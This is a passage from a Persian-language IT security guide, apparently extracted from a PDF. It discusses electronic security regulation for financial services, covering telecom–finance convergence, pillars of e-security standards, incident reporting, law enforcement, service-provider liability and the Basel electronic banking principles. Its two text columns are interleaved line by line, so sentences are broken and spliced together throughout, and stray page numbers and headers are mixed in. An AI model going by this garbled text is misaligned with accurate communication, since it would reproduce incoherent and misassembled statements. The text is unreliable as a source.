ﺿﺎﺑﻄﻪﻣﻨﺪ ﺷﺪﻩ ﻛﻪ ﺩﺭ ﻧﻘـﻞ ﻭ ﺍﻧﺘﻘـﺎﻻﺕ ﻣـﻨﻈﻢ ﻛـﺎﻻ ﻭ ﭘـﻮﻝ،
ﻻ ﺑﻌﻨـﻮﺍﻥ ﺍﺭﺍﺋـﻪﻛﻨﻨـﺪﮔﺎﻥ ﻛﻠﻴـﺪﻱ ﺧـﺪﻣﺎﺕ ﻛﻮﺗـﺎﻩﻣـﻮﺝ، ﻣﻌﻤﻮ ﹰ
ﺍﻋﺘﻤﺎﺩ ﻭ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺑﺎﻻﺗﺮﻳﻦ ﻣﻴﺰﺍﻥ ﺍﻫﻤﻴﺖ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳـﺖ؛ ﻭ
ﻣﺎﻫﻮﺍﺭﻩ ﻭ ﺗﻠﻔﻦ ﻫﻤﺮﺍﻩ ﻓﻌﺎﻟﻴﺖ ﺩﺍﺭﻧﺪ .ﺍﻳﻦ ﺷﺮﻛﺘﻬﺎ ﻣﻤﻜﻦ ﺍﺳـﺖ
ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺍﻳﻨﻜﻪ ﻣﺆﺳﺴﺎﺕ ﻣﺎﻟﻲ ﻧﻴﺎﺯﻣﻨﺪ ﺍﻋﺘﻤﺎﺩ ﻣﺮﺩﻡ ﻫـﺴﺘﻨﺪ،
ﺧﺪﻣﺎﺕ ﻣﻴﺰﺑﺎﻧﻲ ،ﺧﺪﻣﺎﺕ ﺍﻧﺘﻘﺎﻝ ﭘﻮﻝ ﻭ ﺩﺭ ﺑﻌﻀﻲ ﻣﻮﺍﺭﺩ ﺧﺪﻣﺎﺕ
ﺑﺎﻳﺪ ﻓﻌﺎﻟﻴﺖ ﺧﻮﺩ ﺭﺍ ﺳﺎﻟﻢ ،ﻣﻨﻄﻘﻲ ،ﻭ ﻣﺤﺘﺎﻃﺎﻧﻪ ﭘﻴﺶ ﺑﺒﺮﻧـﺪ .ﺑـﺎ
ﺯﻳﺮﺑﻨﺎﻳﻲ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﻧﻴﺰ ﻓﺮﺍﻫﻢ ﻛﻨﻨﺪ.
ﻧﺰﺩﻳﻚﺷـﺪﻥ ﺻـﻨﻌﺖ ﻣﺨـﺎﺑﺮﺍﺕ ﻭ ﺑﺨـﺶ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﺑـﻪ
ﺑﺨﺶ ﺳﻮﻡ
ﻳﻜﺪﻳﮕﺮ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ،ﺍﻫﻤﻴﺖ ﻭ ﺿﺮﻭﺭﺕ ﺍﻳﺠـﺎﺩ ﺳﻴﺎﺳـﺖ ﻣﺎﻟﻜﻴﺖ ﺻﻨﺎﻳﻊ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺍﻣـﻮﺭ ﻣـﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ
ﻋﻤﻮﻣﻲ ﻭ ﻣﻘﺮﺭﺍﺕ ﺁﮔﺎﻫﺎﻧﻪ ﺭﻭﺯ ﺑﻪ ﺭﻭﺯ ﺑﻴﺸﺘﺮ ﻣﻲﺷﻮﺩ ﺗﺎ ﺗﻀﻤﻴﻦ ﺑﺎﻋﺚ ﻃـﺮﺡ ﺳـﺆﺍﻻﺕ ﭘﻴﭽﻴـﺪﻩﺍﻱ ﺩﺭﺑـﺎﺭﺓ ﺳﻴﺎﺳـﺖ ﺭﻗـﺎﺑﺘﻲ ﻭ
ﻛﻨﺪ ﻛﻪ ﺩﻭﻟﺖ ،ﺷﺮﻛﺘﻬﺎﻱ ﺗﺠﺎﺭﻱ ﻭ ﻣﺮﺩﻡ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺍﺳـﺘﻔﺎﺩﺓ ﻛﺸﻤﻜﺸﻬﺎﻱ ﺑﺎﻟﻘﻮﻩ ﺑﺮﺍﻱ ﻛـﺴﺐ ﻣﻨـﺎﻓﻊ ﻣـﻲﺷـﻮﻧﺪ .ﺩﺭ ﻣـﻮﺭﺩ
ﺧﻮﺩ ﺍﺯ ﺧﺪﻣﺎﺕ ﺍﻳﻤﻦ ﻣﺎﻟﻲ ﺭﺍ ﺍﺩﺍﻣﻪ ﺩﻫﻨﺪ. ﺳﻴﺎﺳــﺖ ﺭﻗــﺎﺑﺘﻲ ﻣــﻲﺗــﻮﺍﻥ ﭘﺮﺳــﻴﺪ :ﺁﻳــﺎ ﻧﻘــﺸﻬﺎﻱ ﭼﻨﺪﮔﺎﻧــﺔ
ﺷﺮﻛﺘﻬﺎﻱ ﻣﺨﺎﺑﺮﺍﺗﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺭﻗﺎﺑـﺖ ﺑـﻮﻳﮋﻩ ﺩﺭ
ﺩﺭ ﺗﻬﻴــﺔ ﺳﻴﺎﺳــﺘﻬﺎﻱ ﻋﻤــﻮﻣﻲ ﺑــﻪ ﻣﻨﻈــﻮﺭ ﺍﻳﺠــﺎﺩ ﻳــﺎ ﺍﺻــﻼﺡ
ﻻ ﺑﺮﺍﻱ ﺍﺭﺍﺋـﻪ ﺍﻳـﻦ ﺧـﺪﻣﺎﺕ، ﺑﺎﺯﺍﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺭﺷﺪ -ﻛﻪ ﻣﻌﻤﻮ ﹰ
ﻣﻌﻴﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺎﻳﺪ ﺑﻪ ﻫﺸﺖ ﺭﻛـﻦ ﻣﻬـﻢ ﺗﻮﺟـﻪ
ﻣﺘﺨﺼﺼﻴﻦ ﻓﻨﻲ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺧﻮﺩ ﺩﺍﺭﻧﺪ -ﻣﻨﺠﺮ ﺷﻮﺩ؟ ﻭ ﻳﺎ ﺍﻳﻨﻜﻪ
ﺩﺍﺷﺖ:
ﻳﻜﭙﺎﺭﭼﮕﻲ ﺧـﺪﻣﺎﺕ ﺍﺭﺍﺋـﻪﺷـﺪﻩ ﻭ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺷـﺮﻛﺖ ﺩﺭﺑـﺎﺭﺓ
ﻳﻚ ﭼﺎﺭﭼﻮﺏ ﻗﺎﻧﻮﻧﻲ ﻭ ﺍﺟﺮﺍﻳﻲ ﻣﻨﺎﺳﺐ؛ • ﮔــﺰﺍﺭﺵ ﺩﻗﻴــﻖ ﻭ ﻓــﻮﺭﻱ ﻧﻔﻮﺫﻫــﺎﻱ ﺍﻣﻨﻴﺘــﻲ ﭼﮕﻮﻧــﻪ ﺗــﻀﻤﻴﻦ
ﺗﻤﻬﻴــﺪﺍﺕ ﻓﻨــﻲ ﻭ ﻣــﺪﻳﺮﻳﺘﻲ ﺑــﺮﺍﻱ ﺗــﻀﻤﻴﻦ ﺍﻣﻨﻴــﺖ • ﻣﻲﺷﻮﺩ؟ ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ،ﺭﻭﻧﺪ ﻭﺍﮔﺬﺍﺭﻱ ﺍﻣـﻮﺭ ﺑـﻪ ﻳـﻚ ﺷـﺮﻛﺖ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧﺖ؛ ﺛﺎﻟﺚ ،ﺍﻫﻤﻴﺖ ﺍﺻﻼﺡ ﺣﻮﺯﺓ ﻣﺴﺌﻮﻟﻴﺘﻬﺎ ﺍﺯ ﺭﺃﺱ ﻫﺮﻡ ﻣـﺴﺌﻮﻟﻴﺖ
ﻧﻈﺎﺭﺕ ﻗﻮﻱ ﻭ ﭘﻴﺸﮕﻴﺮﻱ؛ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺍﻧﮕﻴﺰﻩﻫﺎﻱ ﺑﻬﺘـﺮ • ﺩﺭ ﺻﻨﻌﺘﻲ ﺑـﺎ ﭼﻨـﻴﻦ ﻣﺠﻤﻮﻋـﺔ ﭘﻴﭽﻴـﺪﻩﺍﻱ ﺍﺯ ﻓﺮﻭﺷـﻨﺪﮔﺎﻥ ﺭﺍ
ﺩﺭ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻨﺎﺳـﺐ ﻭ ﻻﻳـﻪﺑﻨـﺪﻱﺷـﺪﺓ ﻻ ﺩﺭ ﻗﺮﺍﺭﺩﺍﺩﻫﺎﻱ ﻣﻴﺎﻥ ﻣﺆﺳﺴﺎﺕ ﻣـﺎﻟﻲ ﻭ ﺭﻭﺷﻦ ﻣﻲﻛﻨﺪ .ﻣﻌﻤﻮ ﹰ
ﻣــﺪﻳﺮﻳﺖ ﺧﻄــﺮ؛ ﺍﺯ ﺟﻤﻠــﻪ ﺍﻣﻨﻴــﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﺑــﺮﺍﻱ ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﺑـﻪ ﺁﻧﻬـﺎ ﺍﺯ ﻗـﺴﻤﺘﻲ ﺍﺯ ﻫﺰﻳﻨـﺔ ﻗـﺮﺍﺭﺩﺍﺩ
ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ؛ ﺧﺪﻣﺎﺕ ﺑﻌﻨﻮﺍﻥ ﺿﻤﺎﻧﺖ ﻛﺎﺭﺁﻳﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ ،ﻭﻟﻲ ﺣﺘـﻲ ﺑـﺎ
ﻲ ﺑﻴﻤـﻪ ﺑﺘﻮﺍﻧﻨـﺪ
ﭼﺎﺭﭼﻮﺑﻲ ﻛﻪ ﺩﺭ ﺁﻥ ﺷﺮﻛﺘﻬﺎﻱ ﺧﺼﻮﺻ ﹺ • ﻲ ﻓﻌﺎﻟﻴـﺖﺍﻳﻦ ﻭﺟﻮﺩ ﻫﻢ ﺍﺯ ﺩﻳـﺪﮔﺎﻩ ﺍﻣﻨﻴﺘـﻲ ﺑـﻪ ﻣـﺴﺌﻠﻪ ﻛـﺎﺭﺁﻳ ﹺ
ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻣﻘﺎﺑﻞ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﻴﻤﻪ ﻛﻨﻨﺪ ﻭ ﺩﺭ ﺍﻧﺠﺎﻡﺷﺪﻩ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻛﺎﻓﻲ ﭘﺮﺩﺍﺧﺘﻪ ﻧﺸﺪﻩ ﺍﺳﺖ.
ﻛﻨﺎﺭ ﺁﻥ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺍﻳﻦ ﺣﻮﺯﻩ ﺭﺍ ﺑـﺎ ﺍﻳﺠـﺎﺩ ﺗﻌﻬـﺪﺍﺕ
ﻣﺎﻟﻲ ﺑﺎﺯﭘﺮﺩﺍﺧﺘﻬﺎ ﺍﺭﺗﻘﺎ ﺩﻫﻨﺪ؛ ﻲ ﺻﻨﻌﺖ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ، ﺩﺭ ﻣﻘﺮﺭﺍﺕ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜ ﹺ
ﺍﻣﻀﺎﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ؛ • ﻣﻨﺎﻓﻊ ﻋﻤﻮﻣﻲ ﺑﺎﻳﺪ ﻣﻮﺭﺩ ﺗﻮﺟﻪ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺑﺎﺷﺪ .ﺩﺭ
ﺑﻪﺍﺷﺘﺮﺍﻙﮔﺬﺍﺭﻱ ﺍﻃﻼﻋﺎﺕ؛ • ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺎﻳـﺪ ﻣﻴـﺎﻥ ﺣـﺮﻳﻢ ﺧـﺼﻮﺻﻲ ﻭ
ﺁﻣﻮﺯﺵ ﺷﻬﺮﻭﻧﺪﺍﻥ ،ﻛﺎﺭﻛﻨﺎﻥ ،ﻭ ﻣﺪﻳﺮﻳﺖ ﺩﺭﺑﺎﺭﺓ ﻣـﺴﺎﺋﻞ • ﻣﺴﺎﺋﻠﻲ ﻧﻈﻴﺮ ﻫﺰﻳﻨﻪ ،ﻛﻴﻔﻴﺖ ﺧﺪﻣﺎﺕ ،ﻭ ﻧﻮﺁﻭﺭﻱ ﺑـﻪ
ﺍﻣﻨﻴﺘﻲ؛ ﻭ ﻳﻚ ﺗﻮﺍﺯﻥ ﻣﻌﻘـﻮﻝ ﺭﺳـﻴﺪ ﻭ ﺩﺭ ﺗـﺪﻭﻳﻦ ﺿـﻮﺍﺑﻂ ﻭ
ﻳﻚ ﺳﺎﺧﺘﺎﺭ ﺍﻣﻨﻴﺘﻲ ﻻﻳﻪﺑﻨﺪﻱ ﺷﺪﻩ. •
30 Hosting Companies
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ١٣٠
ﺟﺮﻳــﺎﻥ ﺩﺍﺭﺩ ﺗــﺄﺛﻴﺮ ﺑــﺴﺰﺍﻳﻲ ﺑــﺮ ﺳﻴــﺴﺘﻢ ﭘﺮﺩﺍﺧــﺖ ﺟﻬــﺎﻧﻲ، ﻣﺠﺎﺯﺍﺕ ﭼﻨﻴﻦ ﺟﺮﺍﺋﻤﻲ ﺗﺸﻮﻳﻖ ﻧﻤﺎﻳﻨﺪ ﺗﺎ ﺧﻄﺮ ﺗﻬﺪﻳﺪﺍﺕ ﻣﻮﺟﻮﺩ
ﺳﻴﺎﺳﺘﻬﺎﻱ ﭘﻮﻟﻲ ،ﻭ ﭘﻴﺶﺑﻴﻨﻴﻬﺎﻱ ﺍﻗﺘﺼﺎﺩﻱ ﺩﺍﺭﺩ. ﺍﺯ ﺟﺎﻧﺐ ﺷﺴﺘﺸﻮﻱ ﭘﻮﻝ ﻛﻪ ﺑﻪ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺟﺪﻳـﺪ ﻧﻴـﺰ ﺳـﺮﺍﻳﺖ
ﻛﺮﺩﻩ ﺭﺍ ﻛﺎﻫﺶ ﺩﻫﻨﺪ.
ﺍﻟﺰﺍﻣﺎﺕ ﮔﺰﺍﺭﺵﺩﻫﻲ
ﺍﺟﺮﺍﻱ ﻗﺎﻧﻮﻥ
ﻧﺎﺗﻮﺍﻧﻲ ﺩﺭ ﺗﻬﻴﺔ ﮔﺰﺍﺭﺵ ﺍﺯ ﻭﻗﺎﻳﻊ ﺍﻣﻨﻴﺘﻲ ﺑﻮﻳﮋﻩ ﺩﺭ ﺣﻮﺯﺓ ﺧﺪﻣﺎﺕ
ﻣﺎﻟﻲ ﺑﺮﺍﻱ ﻛﺴﺎﻧﻴﻜﻪ ﺑﺪﻭﻥ ﺍﻧﺠﺎﻡ ﺑﺮﺭﺳﻲ ﻭ ﭘﻴـﺸﮕﻴﺮﻳﻬﺎﻱ ﻻﺯﻡ ﺷﺎﻳﺪ ﺑﺘﻮﺍﻥ ﮔﻔﺖ ﻛﻪ ﻧﻴﺎﺯ ﺑﻪ ﺍﺟﺮﺍﻱ ﻗﻮﺍﻧﻴﻦ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ
ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ،ﺍﺣﺘﻤﺎﻝ ﺗﺪﺍﻭﻡ ﺑﻴـﺸﺘﺮ ﺩﺭ ﻣﺮﺯﻫﺎﻱ ﻳﻚ ﻛﺸﻮﺭ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻭﺟﻮﺩ ﭼﺎﺭﭼﻮﺏ ﻗـﺎﻧﻮﻧﻲ ﺁﻥ ﺍﺯ
ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻧﺎﻣﻄﻤﺌﻦ ﻭ ﻧﺎﺩﺭﺳﺖ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﻭﺍﺭﺩ ﺁﻣﺪﻥ ﺧـﺴﺎﺭﺍﺕ ﺍﻫﻤﻴﺖ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ .ﻣﺒﺪﺃ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻧﻮﺍﻉ ﺣﻤﻼﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ،
ﺑﻴﺸﺘﺮ ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﻣﻲﺩﻫﺪ .ﻳﻚ ﺭﺍﻫﻜﺎﺭ ﻣﻲﺗﻮﻧﺪ ﺍﻳـﻦ ﺑﺎﺷـﺪ ﻛـﻪ ﻛﺸﻮﺭﻫﺎﻳﻲ ﺑﻮﺩﻩﺍﻧﺪ ﻛﻪ ﻧﻈﺎﻡ ﻗﺎﻧﻮﻧﻲ ﻭ ﺍﺟﺮﺍﻳـﻲ ﺿـﻌﻴﻔﻲ ﺑـﺮﺍﻱ
ﻭﻇﻴﻔﺔ ﺗﻬﻴﺔ ﮔﺰﺍﺭﺵ ﺍﺯ ﻭﻗﺎﻳﻊ ﺑﺮ ﻋﻬﺪﺓ ﻣﺄﻣﻮﺭﺍﻥ ﺍﺟﺮﺍﻳﻲ ﮔـﺬﺍﺭﺩﻩ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺍﺷـﺘﻪﺍﻧـﺪ ﻭ ﻫﻤـﻴﻦ ﺍﻣـﺮ ﺿـﺮﻭﺭﺕ ﻭﺟـﻮﺩ
٣٦
ﺷﻮﺩ. ﺭﺍﻫﻜﺎﺭﻫﺎﻳﻲ ﺑﺮﺍﻱ ﻫﻤﻜﺎﺭﻳﻬﺎﻱ ﺑـﻴﻦﺍﻟﻤﻠﻠـﻲ ﺭﺍ ﺑـﻴﺶ ﺍﺯ ﭘـﻴﺶ
ﻧﻤﺎﻳﺎﻥ ﻣﻲﻛﻨﺪ.
ﭘﻴﺸﮕﺎﻣﺎﻥ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﻱ
ﺵ ﻧﻈﺎﺭﺕ ﻭ ﺍﺟﺮﺍﻱ ﻗـﺎﻧﻮﻥ ﻲ ﮔﺴﺘﺮ ﹺ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﺍﻥ ﺑﺎﻳﺪ ﺑﻪ ﭼﮕﻮﻧﮕ ﹺ ﺭﻛﻦ ﺩﻭﻡ:
ﺑﺨﺶ ﺳﻮﻡ
ﻣﺨﺎﻃﺮﺍﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻛﻪ ﺩﺭ ﭼﺎﺭﭼﻮﺏ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻳﻬﺎﻱ ﻣﻮﺟﻮﺩ ﻣﻲﺩﺍﺭﺩ ﺍﻳﻦ ﻣﺤﺼﻮﻝ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ،ﺍﻧﺘﻘﺎﻝ ﻳﺎ ﺫﺧﻴـﺮﺓ ﺍﻃﻼﻋـﺎﺕ
ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﻧﺸﺪﻩﺍﻧـﺪ )ﻣﺜـﻞ ﺗﺨﺮﻳـﺐ ﺳـﺮﻭﻳﺲ ﻳـﺎ ﺳـﺮﻗﺖ ﻫﻮﻳـﺖ( ﻏﻴﺮﻣﺠـــﺎﺯ ،ﺣـــﺴﺎﺱ ﻳـــﺎ ﻣﺤﺮﻣﺎﻧـــﻪ ﻧﺒﺎﻳـــﺪ ﺑﻜـــﺎﺭ ﺭﻭﺩ ﻭ ﺩﺭ
ﺗﺮﻏﻴﺐ ﻳـﺎ ﻣﻠـﺰﻡ ﻧﻤﺎﻳﻨـﺪ .ﺍﺯ ﺁﻧﺠـﺎ ﻛـﻪ ﺻـﻨﻌﺖ ﺑﻴﻤـﺔ ﺑﺨـﺶ ﻏﻴﺮﺍﻳﻨﺼﻮﺭﺕ ﻫﻴﭻ ﻣﺴﺌﻮﻟﻴﺘﻲ ﻣﺘﻮﺟـﻪ ﭘﺪﻳﺪﺁﻭﺭﻧـﺪﺓ ﺁﻥ ﻧﺨﻮﺍﻫـﺪ
ﺧﺼﻮﺻﻲ ﺩﺭ ﺍﻳﻦ ﺣﻮﺯﻩ ﻓﻌﺎﻟﺘﺮ ﺷﺪﻩ ،ﺍﻳﻦ ﺭﻭﺵ ﺑـﻴﺶ ﺍﺯ ﭘـﻴﺶ ﺑﻮﺩ.
ﻋﻤﻠﻲ ﺑﻨﻈﺮ ﻣﻲﺭﺳﺪ ﻭ ﻣﻲﺗﻮﺍﻧﺪ ﺑـﻪ ﺳـﻼﻣﺖ ﻋﻤـﻮﻣﻲ ﺻـﻨﻌﺖ
٤٠
ﺑﻴﻤﻪ ﻭ ﺳﺎﺧﺘﺎﺭ ﺁﻥ ﺩﺭ ﺑﺎﺯﺍﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺭﺷﺪ ﻣﻨﺠﺮ ﺷﻮﺩ. ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻳﻲ ﺑﺮﺍﻱ ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ
ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﺑﻪ ﺻﻨﻌﺖ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻧﺴﺒﺖ
ﻣﺴﺌﻮﻟﻴﺖ
ﺑﻪ ﺗﺄﻣﻴﻦﻛﻨﻨﺪﮔﺎﻥ ﺧـﺪﻣﺎﺗﻲ ﻛـﻪ ﻣـﺴﺘﻘﻴﻤﹰﺎ ﺑـﺎ ﺍﻳـﻦ ﺻـﻨﻌﺖ ﺩﺭ
ﭼﺎﺭﭼﻮﺏ ﺣﻘـﻮﻗﻲ ﻭ ﻗـﺎﻧﻮﻧﻲ ﻣـﻲﺗﻮﺍﻧـﺪ ﺍﻧﮕﻴـﺰﻩﻫـﺎﻳﻲ ﺭﺍ ﺑـﺮﺍﻱ ﺍﺭﺗﺒﺎﻁ ﻧﻴﺴﺘﻨﺪ ،ﺍﺯ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻣﺴﺘﺤﻜﻢﺗﺮﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻨـﺪ .ﺑـﺎﺭ
ﺷﺮﻛﺘﻬﺎﻱ ﻣﻴﺰﺑﺎﻥ ،ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﺑﺮﻧﺎﻣﻪﻫـﺎ ،ﻧـﺮﻡﺍﻓـﺰﺍﺭ، ﺩﻳﮕﺮ ﺗﺄﻛﻴﺪ ﻣﻲﺷﻮﺩ ﻛﻪ ﺑﺎ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻫﻢ ﻫﻨﻮﺯ ﺭﺍﻩ ﺯﻳﺎﺩﻱ ﺗـﺎ
ﺳﺨﺖﺍﻓﺰﺍﺭ ﻭ ﺗﺄﻣﻴﻦﻛﻨﻨﺪﮔﺎﻥ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻳﺠﺎﺩ ﻛﻨـﺪ ﺗـﺎ ﺍﻳﺠﺎﺩ ﺍﻃﻤﻴﻨﺎﻥ ﻭ ﺍﻋﺘﻤﺎﺩ ﻭﺟﻮﺩ ﺩﺍﺭﺩ.
ﺑﻪ ﺻﻨﻌﺖ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﭘﺎﺳﺨﮕﻮ ﺑﺎﺷﻨﺪ.
ﺭﻛﻦ ﺳﻮﻡ:
ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﻧﻈﺎﺭﺕ ﻭ ﺁﺯﻣﻮﻥ
ﭼﺎﻟﺸﻬﺎﻱ ﻧﻈﺎﺭﺕ ﻭ ﭘﻴﺸﮕﻴﺮﻱ
ﻛﻤﻴﺘﺔ ﺑﺎﺳﻞ ﺩﺭ ﮔﺮﻭﻩ ﺑﺎﻧﻜـﺪﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ) (EGBﻣﺆﺳـﺴﺔ
ﻋــﻼﻭﻩ ﺑــﺮ ﻛﻨﺘــﺮﻝ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧــﺖ ﻭ ﻧﻈــﺎﺭﺕ ﺑــﺮ
ﻧﻈﺎﺭﺕ ﺑﺎﻧﻜﻲ ٤١ﺑﺮﺍﻱ ﺍﺭﺍﺋﻪ ﭘﻴﺸﻨﻬﺎﺩ ﺩﺭ ﺯﻣﻴﻨـﻪ ﺍﻓـﺰﺍﻳﺶ ،ﺍﻳﺠـﺎﺩ
ﺍﻧﺘﻘﺎﻝﺩﻫﻨﺪﮔﺎﻥ ﭘﻮﻝ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺻﻼﺡ ﺭﺍﻫﺒﺮﺩﻫﺎﻱ ﻗـﺎﻧﻮﻧﻲ،
ﺗﻐﻴﻴﺮﺍﺕ ﻳﺎ ﺍﻧﺠﺎﻡ ﺍﺻﻼﺣﺎﺕ ﻣـﻮﺭﺩ ﻧﻴـﺎﺯ ﺩﺭ ﻧﻈـﺎﺭﺕ ﻭ ﺍﺭﺯﻳـﺎﺑﻲ
ﻧﻈﺎﺭﺕ ،ﻭ ﭘﻴـﺸﮕﻴﺮﻱ ،ﺑـﺮﺍﻱ ﺗـﻀﻤﻴﻦ ﺍﻣﻨﻴـﺖ ﺍﺭﺍﺋـﻪﺩﻫﻨـﺪﮔﺎﻥ
ﺟﻬﺖ ﺗﻄﺒﻴﻖ ﺭﻭﺍﻟﻬﺎ ﺑﺎ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺟﺪﻳﺪ ﺷﻜﻞ ﮔﺮﻓﺖ .ﺩﺭ ﺳـﺎﻝ
ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﻣﻔﻴﺪ ﺑﺎﺷﺪ .ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﺑـﻮﻳﮋﻩ ﺑـﺮﺍﻱ ﺷـﺮﻛﺘﻬﺎﻱ
EBG ،۲۰۰۱ﺍﺻــﻮﻝ ﻣــﺪﻳﺮﻳﺖ ﻣﺨــﺎﻃﺮﻩ ﺑــﺮﺍﻱ ﺑﺎﻧﻜــﺪﺍﺭﻱ
ﺗﺠﺎﺭﻱ ﻛﻪ ﺩﺭ ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻳﺎ ﺍﺭﺍﺋﻪ ﺳﺎﻳﺮ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﻣﻨﺘﺸﺮ ﻛﺮﺩ ﻛﻪ ﺷﺎﻣﻞ ﺍﺻـﻮﻝ ﺧﺎﺻـﻲ ﺑـﻮﺩ ﻛـﻪ
ﺍﻳﻨﺘﺮﻧﺘﻲ ﻓﻌﺎﻝ ﻫﺴﺘﻨﺪ ﻣﻄﺮﺡ ﻣﻲﺑﺎﺷﺪ.
ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻳﻲ ﺑﺮﺍﻱ ﺗﺄﻳﻴﺪ ﺍﻋﺘﺒﺎﺭ ﻭ ﺗﺼﺪﻳﻖ ﻫﻮﻳـﺖ ،ﻛﻨﺘﺮﻟﻬـﺎﻱ
ﺩﺍﺧﻠــﻲ ،ﺟﺎﻣﻌﻴــﺖ ﺍﻣﻨﻴــﺖ ﺳــﺮﻣﺎﻳﻪﻫــﺎ ﻭ ﻫﻤﭽﻨــﻴﻦ ﺟﺎﻣﻌﻴــﺖ ﻧﻴﺎﺯﻫﺎﻱ ﺳﺮﻣﺎﻳﻪﺍﻱ
ﺍﻃﻼﻋﺎﺕ ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻋـﻼﻡ ﻣـﻲﻛـﺮﺩ .ﺣـﻮﺯﻩﻫـﺎﻱ
ﺭﺍﻫﺒﺮﺩﻫﺎﻱ ﺟﺪﻳﺪ ﺑﺎﺳﻞ ٣٨ﺑﺮﺍﻱ ﺳﺮﻣﺎﻳﻪ -ﺑﻮﻳﮋﻩ ﺁﻧﻬﺎﻳﻲ ﻛﻪ ﺑـﻪ
